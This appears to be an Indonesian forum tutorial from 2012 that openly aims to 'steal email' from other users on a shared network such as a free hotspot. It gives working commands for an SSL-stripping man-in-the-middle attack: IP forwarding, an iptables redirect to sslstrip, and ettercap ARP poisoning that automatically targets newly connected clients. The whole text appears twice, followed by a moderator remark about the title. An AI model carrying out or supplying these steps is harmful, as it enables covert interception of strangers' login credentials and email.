08-24-2012, 09:04 AM
Di sini dalam tutorial ini saya akan menjelaskan bagaimana untuk memecahkan enkripsi SSL tanpa melanggar enkripsi SSL menggunakan Man in the middle Attack untuk mencuri email dalam satu jaringan
1.Buka terminal lalu ketikkan perintah
echo 1 > /proc/sys/net/ipv4/ip_forward
2.ketikkan perintah selanjutnya
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321
3.ketikkan perintah berikutnya
cd /pentest/web/sslstrip
4.ketikkan perintah berikutnya
python sslstrip.py -p -l 54321
![[Image: Selection_002.png]](https://1.bp.blogspot.com/-ylsX3lrNl94/UBtqx-vqOmI/AAAAAAAABPg/8pF0GkiGoP0/s1600/Selection_002.png)
Lalu kita akan membuat log untuk menyimpan email
buka terminal baru lalu ketikkan perintah seperti dibawah ini
cd /pentest/web/sslstrip
tail -f sslstrip.log
![[Image: Selection_003.png]](https://1.bp.blogspot.com/-QlRQf-UtA1Q/UBtryVXoCQI/AAAAAAAABPo/IfUdVY7czvs/s1600/Selection_003.png)
Buka terminal baru lagi lalu ketikkan perintah seperti di bawah ini
ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd
ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian
Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut
Hasil di terminal LOG
![[Image: Selection_006.png]](https://2.bp.blogspot.com/-CJzO4yFfiwI/UBtvhI9M0SI/AAAAAAAABQA/243gNd9zbog/s1600/Selection_006.png)
Hasil di terminal ETTERCAP
![[Image: Selection_005.png]](https://4.bp.blogspot.com/-ypcmhVUeDo8/UBtveVm4uXI/AAAAAAAABP4/BeH1WmtyGAA/s1600/Selection_005.png)
Bahaya sekali bukan main internet di tempat hotspot gratisan
@junior edited this thread, judulnya di edit dikit ya,,agak riskan bahasanya kalau mencuri email
1.Buka terminal lalu ketikkan perintah
echo 1 > /proc/sys/net/ipv4/ip_forward
2.ketikkan perintah selanjutnya
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321
3.ketikkan perintah berikutnya
cd /pentest/web/sslstrip
4.ketikkan perintah berikutnya
python sslstrip.py -p -l 54321
Lalu kita akan membuat log untuk menyimpan email
buka terminal baru lalu ketikkan perintah seperti dibawah ini
cd /pentest/web/sslstrip
tail -f sslstrip.log
Buka terminal baru lagi lalu ketikkan perintah seperti di bawah ini
ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd
ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian
Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut
Hasil di terminal LOG
Hasil di terminal ETTERCAP
Bahaya sekali bukan main internet di tempat hotspot gratisan
@junior edited this thread, judulnya di edit dikit ya,,agak riskan bahasanya kalau mencuri email